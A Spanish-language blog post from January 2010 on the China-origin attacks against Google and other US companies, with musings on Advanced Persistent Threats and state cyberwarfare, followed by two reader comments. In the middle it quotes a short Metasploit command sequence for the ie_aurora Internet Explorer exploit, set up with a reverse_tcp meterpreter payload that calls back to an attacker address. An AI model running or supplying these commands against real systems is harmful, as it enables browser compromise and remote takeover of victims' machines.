lunes, 18 de enero de 2010

Estalló la CyberGuerra!

El reciente ataque informático originado desde China a 33 compañías de USA, que incluyen a Google, Yahoo, Adobe y Juniper Networks, termina de confirmar lo que hace mucho tiempo se viene comentando, la CyberGuerra si existe, y es mas real que nunca.



El Martes 12 de Enero, Google publica "A new approach to China", en donde da cuentas de que fueron una de las víctimas de un ataque originado desde China, y que "probablemente" abandonen ese mercado:

"In mid-December, we detected a highly sophisticated and targeted attack on our corporate infrastructure originating from China that resulted in the theft of intellectual property from Google."

El "highly sophisticated and targeted attack" como lo llama Google, fue realizado durante las fiestas, utilizando un 0-day para Internet Explorer que afecta a las versiones 6, 7 y 8. ¿ Quien habrá sido el empleado deshonesto que no utilizaba Chrome ? Hasta el momento, no esta confirmado que se hallan utilizado 0-days para otros productos, como Adobe, como se especulaba en un comienzo.

Me pregunto si lo de "highly sophisticated" se debe al uso de un 0-day, lo que lamentablemente es cada vez más común hoy en día, o es un intento de excusarse por sus falencias de seguridad. Lo que si llama la atención, es lo altamente dirigidos y coordinados que fueron los ataques.

El Jueves 14 de Enero, una versión del exploit utilizado en estos ataques fue subida a Wepawet, y el Viernes 15, ya teníamos en MetaSploit un PoC funcionando:

./msfconsole
use exploit/windows/browser/ie_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.0.128
set URIPATH /
exploit

En muchos blogs y Twitter, cuando se refieren a estos ataques, suelen utilizar el termino "Advanced Persistent Threat" (APT), el cual por lo menos yo desconocía hasta hace unos días.

A continuación pueden encontrar una definición bastante clara de APT, aunque también les recomiendo leer este post de Bejtlich al respecto:

"APT or Advanced Persistent Threat describes cyber attacks mounted by organizational teams that have deep resources, advanced penetration skills, specific target profiles and are remarkably persisent in their efforts. They tend to use sophisticated custom malware that can circumvent most defenses, stealthy tactics and demonstrate good situational awareness by evaluating defenders responses and escalating their attack techniques accordingly."

Básicamente, estamos hablando de atacantes con sofisticados conocimientos técnicos, con una misión específica que cumplir, y los recursos necesarios para llevarla a cabo. Características que pueden ser encontradas detrás del gobierno de un país.

Ahora, ¿ por qué no se arma una ecatombe política si todos saben que China esta detrás de los ataques ?

En primer lugar seria muy inocente pensar que solo China tiene la capacidad de realizar una "CyberGuerra", leí en algún lugar que USA, Inglaterra, Francia, Israel, Korea del Norte, Iran y Rusia, también se encuentran activamente realizando estas actividades.

No tengo idea de cual será el marco legal internacional, si es que existe, cuando un ataque informático esta siendo desarrollado por el gobierno de un país, pero me encontré con un blog que presenta unos conceptos muy interesantes extraídos del libro "Inside Cyber Warfare", en donde uno de los capítulos fue escrito por un militar de alto rango de USA.

Una de las ideas que presenta, es que los gobiernos, por lo menos Rusia y China, tienden a utilizar civiles para hacer su trabajo sucio, brindándoles a estos inmunidad por los trabajos que realizan, siempre y cuando ataquen a los enemigos del gobierno. Por supuesto, los gobiernos ganan con esto una "negación plausible", ya que sería muy difícil probar que el ataque fue efectivamente realizado por ellos.

Otra de las ideas presentadas, es que los países que realizan ataques informáticos, o que por su inacción los permitan, están sacrificando su derecho a no ser molestados, y por lo tanto, se los puede contraatacar.

Para finalizar con lo de la CyberGuerra, si están buscando una nueva profesión, les recomiendo que se especialicen en escribir exploits, quien sabe cuanto pueda valer un 0-day en los días por venir. Aunque es probable que en lugar de ser llamados "Security Researcher" o "Exploit Writer", los llamen Capitán o Subcomandante... :P

FUENTES:

2 comentarios:

Alexander dijo...

Leo!
Fijate lo que dice este general sobre respuestas a ciber ataques...

"La Casa Blanca tiene la opción de responder con la fuerza física – e incluso con armas nucleares – en caso de que una entidad extranjera realizara un ataque cibernético que provocara la desactivación de las redes de computadoras de EE.UU"

http://gsn.nti.org/gsn/nw_20090512_4977.php

ShadowChild dijo...

Jajaja excelente la opción de la casa blanca. "Ellos tienen la certeza de quienes los atacan, así que procederán a defenderse con armas nucleares". Que hdp.

LinkWithin